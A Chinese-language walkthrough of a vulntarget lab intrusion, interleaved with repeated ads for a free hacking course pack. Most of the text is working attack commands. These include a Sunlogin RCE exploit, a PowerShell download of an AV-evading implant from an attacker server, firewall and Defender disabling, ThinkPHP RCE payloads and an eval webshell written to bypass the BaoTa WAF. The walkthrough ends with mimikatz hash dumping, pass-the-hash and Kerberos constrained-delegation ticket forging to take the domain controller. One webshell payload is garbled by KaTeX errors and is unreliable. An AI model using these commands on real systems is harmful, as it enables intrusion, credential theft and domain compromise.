靶场｜宝塔绕过+约束委派=获取域控，网络安全零基础入门到精通教程！

靶场拓扑：

复现过程：

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术（网络安全）电子书以及视频教程，需要的小伙伴可以扫描下方二维码或链接免费领取~

VM虚拟机搭建好后ping不通外网主机，开了防火墙这里利用goby扫全端口出来一个49685端口，访问试试

访问后显示Verification failure 这里判断可能存在向日葵客户端，尝试利用Exp:https://github.com/Mr-xn/sunlogin_rce

命令:xrkRce.exe -h 192.168.1.78 -t rce -p 49685 -c “whoami”

可以执行命令后先把防火墙关了：netsh firewall set opmode mode=disable

执行进程查看命令均失败可能存在杀软，进程也查看不了

这里利用一条命令:xrkRce.exe -h 192.168.1.78 -t rce -p 49848 -c “powershell ( new-object System.Net.WebClient).DownloadFile( ‘http://IP/x64.exe’ , ‘C:\Users\Administrator\x.exe’ )”

把vps上的x.exe下载到指定目录下，注意马子需要做免杀

这里看到能直接下载下来我们的马子到目标电脑上了

执行命令成功上线cs，针对杀软还有一种思路，直接关闭defender

执行:reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /d 1 /t REG_DWORD /f 这条命令会报错原因是这里的双影号被闭合掉了，换一条命令直接能执行成功，命令如下：set-MpPreference -DisableRealtimeMonitoring $true

因为中间环境出了问题，直接反弹到msf开代理扫内网c段

这里是直接没有扫出来然后换思路，信息收集发现主机上存在的测试地址想着利用host碰撞

脚本地址:https://github.com/fofapro/Hosts_scan

命令:proxychains python3 IP_hosts_scan.py

这里成功访问到了www.cJO6w10YLS.com这个域名内，本地配置代理和host头访问

然后尝试弱口令没有进去想着会不会有sql注入也尝试了一下也不行

读了一下源码发现form表单未向后端传输数据，可见这里是一个假的login页面

在落地机火狐浏览器访问历史记录内发现/vulntarget/public目录本地尝试访问

thinkphp 5.0框架存在远程命令执行，尝试利用很多个rce payload都不行然后不是被上墙就是被拦截

然后换了个payload打过去显示出了宝塔的拦截页面

再打就上黑名单直接拉黑处理，当时头都大了

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术（网络安全）电子书以及视频教程，需要的小伙伴可以扫描下方二维码或链接免费领取~

常见payload:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

由于这个system函数被禁用了执行不了命令然后尝试绕过宝塔

由于public这个目录一直显示权限不够想着可能是没有写入权限，那就多加个…/写到上级根目录里面去，利用file_put_contents这个函数来写shell

payload:s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=…/…/12345.php&vars[1][1]=<?php $poc="axsxsxexrxt";$poc_1 = explode(“x”, $poc); $poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . KaTeX parse error: Undefined control sequence: \[ at position 7: poc\_1\̲[̲3\].poc_1[4].KaTeX parse error: Undefined control sequence: \[ at position 7: poc\_1\̲[̲5\];poc_2(urldecode(urldecode(urldecode($_REQUEST[‘12345’]))));

这里对phpinfo()编码后一直执行不了命令，那直接写一个phpinfo上去看看

其实也没什么太大问题，那接下来就是getshell了，写上去一个马

马子内容:<?php @eval(base64\_decode($\_POST\[mr6\]));?>

利用蚁剑加载编码器：‘user strict’; module.exports = (pwd, data, ext={}) => { data[pwd] = Buffer.from(data[‘‘]).toString(‘base64’); delete data[’’]; return data; }

客户端再做个body体伪造：

然后才算是成功getshell

尝试命令执行发现禁用了命令，前期看到的php版本是7.0以上，这里直接用宝塔自带的插件绕过，成功执行命令

然后在/home/vulntarget 目录下发现一个key可能是root的，这里直接拖下来尝试连接

用户名：root 密码为空

然后回头做一下信息收集，本来想cs直接读hash的这里尝试一种新方法

利用Procdump工具把主机hash文件下载下来拖到本地利用mimikatz解密，解密后这里获取到了两个账户明文密码

Linux上线有很多畸形方法，前面root用户的key已经拿到直接可以关闭linux防火墙策略然后正向，反向shell都没问题，这里还是按照老路子来走

一开始想的是做msf正向连接但是都不行，尝试反弹shell也不行，做一下端口出网探测

软件地址:https://github.com/FunnyWolf/TFirewall

win2016上传一个tfs_windows_amd64.exe，ubuntu上传一个tfc_linux_386，注意文件大小然后win16上使用命令:tfs_windows_amd64.exe check 100-200

ubuntu上使用命令:./tfc_linux_386 check 192.168.100.155 100-200

这里可以看到113 119端口出网，尝试反弹shell上线

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术（网络安全）电子书以及视频教程，需要的小伙伴可以扫描下方二维码或链接免费领取~

然后这里成功上线linux这台主机，然后进行内网信息收集

ifconfig发现存在88网段

添加路由扫内网:run autoroute -s 192.168.88.1/24

查看路由信息:run post/multi/manage/autoroute

前面的扫内网模块一直不通这里直接读linux缓存，信息收集出来两个IP地址，129和254

使用:use auxiliary/server/socks_proxy

开出来一条代理然后goby上直接扫端口，一开始这样是不行的因为这里开了iptables规则，这里自己添加一条出网规则或者放行所有端口：

iptables -A INPUT -j ACCEPT iptables -A OUTPUT -j ACCEPT

上传fscan 到ubuntu上面扫c段，测试存活192.168.88.129

命令探测smb:./fscan_amd64 -h 192.168.88.129 -m smb

利用wmiexec.py登陆指定服务器，命令:python3 wmiexec.py ‘administrator:admin@123@192.168.88.129’

然后上来检测一下杀软准备上线cs

没有杀软进程且用户权限为管理员权限，直接powshell上线cs，本地信息收集发现存在域环境且有10网段

先定位域控IP地址，直接ping域名或者和域控同步时间

现在确定了域控IP，尝试抓本地hash

域管hash:2fbbf192edbdf90700220cb6a6caf4a2

这里可以利用mimikatz来抓或者cs插件来读取hash，拿去解密发现解不出来，接着尝试哈希传递

这里开一条代理然后尝试wmiexec传递hash，命令：python3 wmiexec.py -hashes:2fbbf192edbdf90700220cb6a6caf4a2 vulntargrt/administrator@10.0.10.10 “ipconfig”

利用约束委派来打一下

1.tgt伪造：

tgt::ask /user:win2008 /domain:vulntarget.com /password:qweASD123 /ticket:ash.kirbi

2.cifs协议伪造：

tgs::s4u /tgt:TGT_win2008@VULNTARGET.COM_krbtgt~vulntarget.com@VULNTARGET.COM.kirbi/user:Administrator@vulntarget.com /service:cifs/WIN-1PV25H8UJPN.vulntarget.com

3.票据导入

kerberos::ptt TGS_Administrator@vulntarget.com@VULNTARGET.COM_cifs~WIN-1PV25H8UJPN.vulntarget.com@VULNTARGET.COM.kirbi

4.dir | net user 都可以使用了

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术，作为新手一定要先学习成长路线图，方向不对，努力白费。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，其中一共有21个章节，每个章节都是当前板块的精华浓缩。（全套教程扫描领取哈）

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍：

黑客资料由于是敏感资源，这里不能直接展示哦！ （全套教程扫描领取哈）

👉4.护网行动资料👈

其中关于HW护网行动，也准备了对应的资料，这些内容可相当于比赛的金手指！

👉5.黑客必读书单👈

👉6.网络安全岗面试题合集👈

当你自学到这里，你就要开始思考找工作的事情了，而工作绕不开的就是真题和面试题。

所有资料共282G，朋友们如果有需要全套《网络安全入门+进阶学习资源包》，可以扫描下方二维码或链接免费领取~